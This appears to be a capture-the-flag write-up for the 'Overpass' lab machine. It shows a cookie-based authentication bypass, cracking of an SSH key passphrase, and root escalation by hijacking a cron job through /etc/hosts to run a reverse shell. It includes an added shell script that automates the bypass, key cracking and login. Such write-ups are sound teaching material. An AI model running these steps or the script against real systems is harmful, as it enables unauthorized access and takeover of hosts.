[Linux] Overpass
Reconnaissance
sudo nmap 10.10.108.252
sudo nmap -A 10.10.108.252

Enumeration
HTTP

Web page enumeration

We discovered a page named /admin, which might be worth exploring.

On this page, there's a login form. I attempted various techniques to bypass authentication: brute-force attacks, SQL injection, and exploiting known vulnerabilities. However, none of them worked.
After reviewing the hints provided, which mentioned the OWASP Top 10, I decided to explore the first item on the list: Broken Access Control. Inspecting the page source in the browser's developer tools, I noticed something interesting in login.js: the application only checks whether a cookie named SessionToken is present, not whether its value corresponds to a real session.

By setting a fake value for this cookie, I was able to bypass authentication and access a page containing an RSA private key.

It appears the key belongs to a user named james. I saved it locally and set the appropriate permissions:

The private key is passphrase-protected, so we need to crack it with John the Ripper (ssh2john first converts the key file into a hash format that John can attack with a wordlist):

With the recovered password, we can now SSH into the machine and retrieve the user flag.
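The steps above, from the cookie bypass to the SSH login, as an added example that is not part of the original writeup. It is a small POSIX shell script; the target IP, the saved page name admin.html, the output file id_rsa_james and the wordlist path are all parameters and are assumptions, not values taken from the page. The sample HTML it is tested against is constructed, and the ENCRYPTED-header check only applies to PEM-format keys such as the RSA key served here.

```shell
#!/bin/sh
# Added example (not from the original writeup): pull the PEM key out of the
# saved /admin page, fix its permissions, and hand it to ssh2john/john.
# Assumed: target IP, page file name, key file name and wordlist are all
# parameters chosen for this example.

# Copy everything between the BEGIN/END markers into <out>, stripping any
# HTML tags that may wrap the key, and restrict it to the owner (ssh refuses
# private keys that are group- or world-readable). Prints the number of
# lines extracted so the caller can tell whether a key was found at all.
extract_key() {
    page="$1"; out="$2"
    sed 's/<[^>]*>//g' "$page" \
        | sed -n '/-----BEGIN [A-Z ]*PRIVATE KEY-----/,/-----END [A-Z ]*PRIVATE KEY-----/p' \
        > "$out"
    chmod 600 "$out"
    key_line_count "$out"
}

# Number of lines in the extracted key file; 0 means nothing usable was found.
key_line_count() {
    if [ -s "$1" ] && head -n1 "$1" | grep -q 'PRIVATE KEY'; then
        wc -l < "$1" | tr -d ' '
    else
        echo 0
    fi
}

# True when a PEM key carries the "ENCRYPTED" header, i.e. it needs a
# passphrase and therefore cracking before ssh will accept it.
key_is_encrypted() {
    grep -q 'ENCRYPTED' "$1"
}

# Full sequence; only runs when invoked as: sh getkey.sh run <target-ip> <wordlist>
if [ "${1:-}" = "run" ]; then
    target="$2"; wordlist="$3"
    # Any non-empty SessionToken value satisfies the broken check on /admin.
    curl -s -b 'SessionToken=anything' "http://$target/admin" -o admin.html
    extract_key admin.html id_rsa_james
    if key_is_encrypted id_rsa_james; then
        ssh2john id_rsa_james > id_rsa_james.hash   # may be ssh2john.py on some distros
        john --wordlist="$wordlist" id_rsa_james.hash
        john --show id_rsa_james.hash
    fi
    ssh -i id_rsa_james "james@$target"
fi
```

The extraction is deliberately tag-agnostic: the key on the page may sit inside a pre or textarea element whose opening tag shares a line with the BEGIN marker, and a naive grep for the marker alone would keep the tag and corrupt the key.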

Further exploring the "Overpass" application on the system, we obtain James's password, but this doesn’t yield any additional privilege or access.

Escalation
Process analysis
We use scp to upload pspy to the target machine. Monitoring processes reveals a cron job that downloads and executes a script from overpass.thm as root (uid=0).

We also confirm that /etc/hosts is writable by our user, which matters because it lets us control what overpass.thm resolves to on this host:

Exploitation Strategy
On the attacker's machine, create a file named buildscript.sh containing a reverse shell payload.

Start a simple HTTP server from a directory that mirrors the path the cron job requests: a folder downloads with a subfolder downloads/src, and buildscript.sh placed inside downloads/src. The cron job fetches a bare hostname over plain HTTP, so the server must listen on port 80 and the path must match exactly; otherwise the download fails and the job simply does nothing.

Start a listener to catch the reverse shell:

On the target machine, edit the /etc/hosts file so that overpass.thm resolves to the attacker's IP address. On a default Linux resolver configuration /etc/hosts is consulted before DNS, so the cron job will contact our server instead of the real one.

Wait for the cron job to run. It will download and execute the malicious script as root, giving you a reverse shell with root privileges.

Conclusion
Broken access control: the /admin page trusts the mere presence of a SessionToken cookie, exposing a private key.
Weak passphrase on the SSH private key, recoverable with a wordlist attack.
Poor file permissions, allowing modification of critical files like /etc/hosts.
Insecure cron job that blindly downloads and executes a script from a hostname, as root, without any integrity check.